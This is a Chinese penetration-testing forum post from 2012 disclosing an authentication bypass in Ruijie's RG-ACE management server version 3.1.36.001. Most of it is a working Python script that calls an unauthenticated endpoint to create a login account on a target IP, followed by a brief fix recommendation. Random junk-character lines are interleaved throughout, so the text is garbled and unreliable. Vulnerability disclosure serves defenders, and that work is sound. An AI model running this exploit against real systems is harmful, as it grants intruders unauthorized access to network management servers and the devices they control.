中国网络渗透测试联盟
标题:
锐捷应用控制引擎管理服务器可以增加用户
[打印本页]
作者:
admin
时间:
2012-12-10 10:16
标题:
锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接
http://www.ruijie.com.cn/service/down-search.aspx
显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
( H8 ]. v/ \7 Z" P2 R
3 o5 l3 {& w( e: B' P
, w( L+ f& m8 q8 Y! x, a( [
测试的具体版本是
" t _# Q* r' K( A5 h% J
产品名称: 锐捷应用控制引擎
1 E% W3 W/ ~# W% ?% A
版本号: 3.1.36.001 TC
5 ?" P$ [1 p$ O G" v
编译时间: 201104291730
/ s' R% p# P: m f- m8 X1 ~
0 \, G4 m9 J! ^) r/ Q* b+ f
J2 Z s- k4 i* s8 H& W9 t# a3 O
漏洞证明:
7 ~. q$ v e* \9 f; L9 T$ K, n
; P" n. Y; `" [9 o# D5 m. H( Q) k) I
! b8 Y8 v6 E; O% E* q( |
0 @: Q1 p( {) a6 V7 l% A7 u
# [* ~! g5 s8 h* R7 ?
3 b; {- [5 |/ ]1 T8 T& q
- N; w% B5 i4 ?- Y
执行脚本
# Z! \% r" M1 U
#! /usr/bin/env python
+ Z3 b6 v, }) M( y. N6 `
#coding=gbk
( C5 J; U3 C6 A* e0 e: z d' q
#RG-ACE管理服务器 V3.1.36.001
1 G. j3 h1 U \3 H- U4 x
import urllib2, urllib,cookielib
) f I, ]" S- Y+ r3 X$ ^0 B
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
4 b% ~$ h- _$ U f1 |0 q$ v
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
7 L# I; Z4 i2 u" y4 U4 ]
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
" w1 F$ \& n$ B# d5 w
post=(("event","userManager.doInsertUserInfo"),
: V4 \" a/ i% g' p' }5 Y9 b. | n
("useractionname","addButtonValue"),
5 u% D( ^3 S5 L
("useropermanager","userManager"),
) f- b& e6 l' _" Z7 Y/ v: D, p
("userName","t"), #######账号自己加
5 u' U' f1 X# e% T( ?7 N/ h0 w9 P
("pwd","aaaaaa"),######密码自己加
8 s5 E9 I' P" R8 r/ X/ ^
("trueName","ad"),
i1 f- t( s7 T" p& h: c2 ?$ e
("email",""),
& a0 s, j2 n' J( W( _1 X4 {
("mobilePhone",""),
8 y H* E& B3 U0 q Z9 X
("officePhone",""),
" [3 f" t* i. l4 L6 ^
("addr",""),
( R5 n9 j( D# V& e- h7 F
("submit","确定"))
( H! @9 ~* ^7 z& W2 Z
urllib2.install_opener(opener)
4 v0 k& n/ g4 P- g5 L) S. S& N
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
' W% X; k4 s' ^' Q9 _: m% I3 |
print "Done"
" B- b2 B* e% |- Q2 E" u
; W; m4 D5 ~( |
登录,连接设备
- C- B8 ^, W# Z) k, ~
, P4 x7 u: \# z: Y a/ h/ t) r8 U/ {
, a. V5 P5 `- ?( X5 m3 Y
' |: i+ X+ k6 a4 t2 E& K! _
0 d X7 w0 R- M% w# O4 w; {
# ?; _) t" m% e8 ~ F' g" k
默认的管理员admin权限更大点
1 C8 k" {, Z% w
3 O, s7 ?$ y9 R
, n K% _- Y& r4 y% H
! ^, Z, u( H8 ]7 C' d1 d4 V( ?
' Q& @ [2 K0 h+ ?7 y
; \* g, S/ e/ l- L
修复方案:
4 r( K8 ?) J( ?; `1 V( y
加强对接口的权限验证
% I1 V8 b$ ?* A) G. e( u- o4 H0 S- l
" ?# b u2 e% \; q4 ]
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2